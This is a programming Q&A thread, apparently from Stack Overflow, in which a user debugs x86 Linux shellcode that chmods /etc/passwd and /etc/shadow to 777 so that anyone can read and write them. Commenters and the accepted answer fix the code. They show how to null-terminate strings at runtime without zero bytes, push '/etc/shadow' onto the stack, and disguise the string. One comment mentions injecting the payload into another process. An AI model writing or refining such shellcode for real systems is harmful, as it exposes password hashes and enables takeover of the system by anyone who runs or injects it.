# Why doesn't this assembly work?

Tags: assembly, x86, shellcode

```
section .text
    global _start
_start:
    jmp short init

    main2:
    mov al, 15
    pop ebx
    mov ecx, 0x111111ff
    shl ecx, 0x14
    shr ecx, 0x14
    int 0x80

    xor ebx, ebx
    mul ebx
    mov al, 1
    int 0x80

    main1:
    mov al, 15
    pop ebx
    mov ecx, 0x111111ff
    shl ecx, 0x14
    shr ecx, 0x14
    int 0x80

    xor ebx, ebx
    mul ebx
    mov ecx, eax

    call main2
    db '/etc/shadow'

    init:
    call main1
    db '/etc/passwd'
```

This manages to set /etc/passwd to 777, but /etc/shadow remains untouched. The execution flow does go through main2, but it does not do anything to /etc/shadow. Replacing main2's functionality with this:

```
EAX: 4 ; sys_write
EBX: 1 ; stdout
ECX: '/etc/shadow' ; popped from stack with "pop ecx", holds "/etc/shadow"
EDX: 11
int 0x80
```

prints out "/etc/shadow" properly onto the terminal.

Finally, an "info reg" in GDB shows that the value of ECX before the interrupt as "0x1ff", which is equivalent to "chmod 777". So why doesn't this work?

EDIT: So the code doesn't work due to there being junk at the end of '/etc/shadow'. So now my question is, why is there junk at the end and how should I get this to work.

Comment: Run it through `strace` to see the syscall arguments and their return values.

Comment: You could also check the return value from the syscall since you are already in gdb :)  PS: I don't see where you zero terminate your string. `/etc/passwd` might accidentally be zero terminated if zero byte follows your code, but `/etc/shadow` is followed by a `call` opcode which certainly isn't zero.

Comment: Yes, the string was not terminated at shadow but was followed by some junk after running it through strace, although I'm not too sure why as I am not very fluent with programming. So how do I terminate it?

Comment: @SimonL. You add another byte after it with zero value. `db '/etc/shadow',0` (note the added ",0" zero byte, after the 'w' byte) (do that for the other string too).

Comment: @Ped7g note that this is shellcode where 0 bytes are not normally allowed. So, the string should be zero terminated at runtime.

Comment: @Jester I see... missed that completely. Well, then he has to produce the zero by code, so I would put `db '/etc/shadow',128` in code, and in the main1/2 routines after `pop ebx` I would do `and byte [ebx+11],127` +11 because both strings have same fixed length of 11 chars, so that 128 byte should be at +11 offset (I think I managed to avoid any `00` in machine code by doing this? Too lazy to assemble it to verify).  (EDIT: naah, OCD prevails... `80 63 0b 7f  | AND  BYTE PTR [ebx+0xb],0x7f`

Comment: OP: there are of course *many* ways how to produce zero, so why did I go for using `0x80` as terminator with `and value,127` instruction to "fix" it? Because my initial idea was to `and` every byte of string, `and 127` doesn't affect valid 7b ASCII codes, only the `0x80` would be modified to zero. Then later I realized I have to fix only the terminator, and both terminators are at fixed +11 positions, so one byte and is enough. But you may use this to obfuscate the string a bit, like `db '/etc/sha', 'd'+0x80,'o'+0x80,'w'+0x80,0x80`, and then do `and [ebx+8],0x7F7F7F7F` to restore the letters.

Answer (score 0, accepted):

> why is there junk at the end

Because you put it there.  The assembler just assembles bytes into the output file, so it's up to you to put the right bytes in the right order.

> and how should I get this to work.

Jester already answered this in a comment: "This is shellcode where 0 bytes are not normally allowed. So, the string should be zero terminated at runtime."

So leave a byte after the end of `/etc/shadow` for you to overwrite, and at run-time overwrite it with a zero.  (zero a register with `xor eax,eax` or something).

Note that if you assemble and run your code as a stand-alone executable, the strings will be in the read-only text segment.  You could put them in `section .data` to simulate what will happen when you inject this into the stack of another process.  I forget which segments are non-executable by default in Linux processes.

The other way to go about this is to push the string onto the stack.  Since you're using 32-bit code, PUSH imm32 should be useful.  PUSH imm8 can give you zero-padding without a zero in the instruction.

Like maybe

```
push  'w'         ; imm8  -> w 0 0 0
push  'hado'      ; imm32 -> h a d o
push  'tc/s' 
push  '///e'
mov   ebx, esp    ; ebp = pointer to '///etc/shadow'
;lea ebx, [esp+2]   ; skip the leading "//", just to show that this technique works even if you can't pad your string to fill whole chunks of 4B.
```

In 64-bit code, `push imm32` leave 4 bytes of zeros (or ones, since the imm32 is sign-extended to 64-bit).  You could fill those with a `mov dword [rsp+4], imm32`, or `push word imm16` to push 2 bytes at a time.  (leaving the stack misaligned.)  x86-64 machine code can't encode a 32-bit operand-size push.

---

Other bugs in your code:

- `mov al, 15` doesn't set the rest of eax.  It depends on the upper bytes being zero for getting the right system call number.

  Try `push 15` / `pop eax`.  Remember that execution speed doesn't matter when writing shellcode, so you can use idioms that are nasty and slow.  Some of the same things that are good for [code-golf](http://codegolf.stackexchange.com) / code-size optimization are good here, too, since zero bytes are usually wasted padding to be avoided.  I have a few x86 machine code answers over on codegolf.SE.

Comment: Can you leave an example on how to zero terminate it at runtime? Unfortunately Ped6g's comment to AND byte [ebx+11] lands a segfault. Doesn's this instruction AND the byte dereferenced at [ebx+11]?

Comment: @SimonL.: that should work.  Not tested, but I think I got all the bytes in the right order.